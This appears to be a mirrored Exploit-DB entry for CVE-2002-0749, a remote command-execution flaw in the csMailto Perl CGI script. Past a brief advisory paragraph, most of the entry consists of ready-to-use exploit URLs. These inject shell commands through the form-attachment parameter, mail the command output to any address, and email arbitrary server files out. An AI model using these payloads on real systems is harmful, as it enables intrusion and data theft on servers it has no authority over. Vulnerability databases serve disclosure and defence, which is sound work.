- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21415
- Проверка EDB
-
- Пройдено
- Автор
- STEVE GUSTIN
- Тип уязвимости
- REMOTE
- Платформа
- CGI
- CVE
- cve-2002-0749
- Дата публикации
- 2002-04-23
Код:
source: https://www.securityfocus.com/bid/4579/info
CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script.
Reportedly, configuration values used by the script are contained in hidden form values. As a result, a remote attacker may trivially modify these values between script invocations. Consequences include arbitrary command execution on the vulnerable system.
- execute commands on server
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
- execute command on server and mail output to anyone
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&[email protected]&form-autoresponse=YES&command=mailform
- email server file to anyone
CSMailto.cgi?form-attachment=FILEPATH_HERE&[email protected]&form-autoresponse=YES&command=mailform
- Источник
- www.exploit-db.com